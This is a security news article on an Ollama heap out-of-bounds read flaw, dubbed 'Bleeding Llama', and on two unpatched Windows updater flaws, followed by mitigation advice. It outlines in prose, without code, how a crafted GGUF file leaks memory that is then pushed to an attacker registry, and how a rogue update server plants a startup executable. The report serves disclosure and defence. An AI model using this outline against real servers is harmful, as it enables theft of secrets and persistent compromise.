Illustration of a llama bleeding data, symbolizing the Ollama 'Bleeding Llama' vulnerability and data leakage.
Uncategorized

Ollama Under Siege: Critical ‘Bleeding Llama’ Flaw Exposes AI Secrets, Windows Users Face Persistent Threat

Share
Share
Pinterest Hidden

Ollama Under Siege: Critical ‘Bleeding Llama’ Flaw Exposes AI Secrets, Windows Users Face Persistent Threat

A chilling revelation from cybersecurity researchers has sent ripples through the AI community: a severe vulnerability in Ollama, the popular open-source framework for running large language models (LLMs) locally, could allow attackers to remotely pilfer entire process memory. Dubbed “Bleeding Llama” by Cyera, this out-of-bounds read flaw (CVE-2026-7482, CVSS score: 9.1) is estimated to jeopardize over 300,000 servers worldwide. As if that weren’t enough, separate, unpatched vulnerabilities in Ollama’s Windows update mechanism threaten persistent code execution, painting a grim picture for users.

Unpacking ‘Bleeding Llama’: A Memory Leakage Nightmare

Ollama, a darling of developers with over 171,000 GitHub stars, empowers users to run sophisticated LLMs without relying on cloud infrastructure. However, this convenience comes with a perilous cost. The “Bleeding Llama” vulnerability stems from a heap out-of-bounds read within the GGUF model loader, specifically affecting Ollama versions prior to 0.17.1. GGUF (GPT-Generated Unified Format) is the standard for storing and executing LLMs locally.

The core of the problem lies in how Ollama handles GGUF files. When an attacker supplies a specially crafted GGUF file to the /api/create endpoint, they can declare tensor offsets and sizes that exceed the file’s actual length. During the quantization process, particularly in the WriteTo() function (found in fs/ggml/gguf.go and server/quantization.go), the server attempts to read beyond its allocated heap buffer. This critical oversight is exacerbated by Ollama’s use of the unsafe package, bypassing crucial memory safety guarantees.

The Dire Consequences: Your AI’s Inner Workings Exposed

A successful exploitation of CVE-2026-7482 is not merely theoretical; it’s a direct pipeline to an organization’s most sensitive AI-related data. Attackers can trigger the out-of-bounds read by setting a tensor’s shape to an arbitrarily large number, leading to the leakage of:

  • Environment variables
  • API keys
  • System prompts
  • Concurrent users’ conversation data

This treasure trove of information can then be exfiltrated by uploading the compromised model artifact via the /api/push endpoint to an attacker-controlled registry. The attack chain is alarmingly straightforward:

  1. Upload: A malicious GGUF file with an inflated tensor shape is sent to a network-accessible Ollama server via an HTTP POST request.
  2. Activate: The /api/create endpoint is used to initiate model creation, triggering the out-of-bounds read.
  3. Exfiltrate: The /api/push endpoint is leveraged to siphon off the leaked heap memory data to an external server.

Dor Attias, a security researcher at Cyera, starkly warns, “An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more.” He adds, “Engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher — all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker’s hands.”

Immediate Action Required: Fortifying Your Ollama Instances

Given the severity, users are urged to take immediate protective measures:

  • Apply Latest Fixes: Update Ollama to version 0.17.1 or newer without delay.
  • Limit Network Access: Restrict external access to Ollama servers.
  • Audit and Isolate:

    Scrutinize running instances for internet exposure and secure them behind robust firewalls.

  • Implement Authentication: Deploy an authentication proxy or API gateway, as Ollama’s REST API lacks built-in authentication.

Windows Users Beware: Unpatched Flaws Pave Way for Persistent Code Execution

Adding to Ollama’s security woes, researchers at Striga have unveiled two critical, yet still unpatched, vulnerabilities within the Windows update mechanism. Disclosed on January 27, 2026, and made public after a 90-day disclosure period, these flaws can be chained together to achieve persistent code execution.

Bartłomiej “Bartek” Dmitruk, co-founder of Striga, explains that the Windows desktop client automatically starts on login, listens locally on

127.0.0.1:11434, and periodically checks for updates via the /api/update endpoint. The identified vulnerabilities exploit this update routine:

  • CVE-2026-42248 (CVSS score: 7.7): Missing Signature Verification. Unlike its macOS counterpart, the Windows updater fails to verify the digital signature of the update binary before installation.
  • CVE-2026-42249 (CVSS score: 7.7): Path Traversal. The Windows updater constructs the local path for the installer’s staging directory directly from HTTP response headers without proper sanitization.

An attacker who can control an update server reachable by a victim’s Ollama client can exploit these flaws. This allows them to supply an arbitrary executable as part of the update process, which then gets written to the Windows Startup folder and executed on every login, all without triggering any signature check warnings. One potential attack vector involves overriding the

OLLAMA_UPDATE_URL to point to a malicious server.

Protecting Against Persistent Threats

While these Windows flaws remain unpatched, users should exercise extreme caution. Until official patches are released, consider:

  • Monitoring Network Traffic: Keep an eye on update requests from Ollama clients.
  • Restricting Update Sources: If possible, configure firewalls or network policies to only allow updates from trusted Ollama servers.
  • Manual Updates: Consider disabling automatic updates and performing manual updates only after verifying their integrity.

The recent disclosures underscore a critical need for vigilance in the rapidly evolving AI landscape. As LLMs become integral to operations, securing the frameworks that run them is paramount to preventing catastrophic data breaches and maintaining trust in AI technologies.


For more details, visit our website.

Source: Link

Share

Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *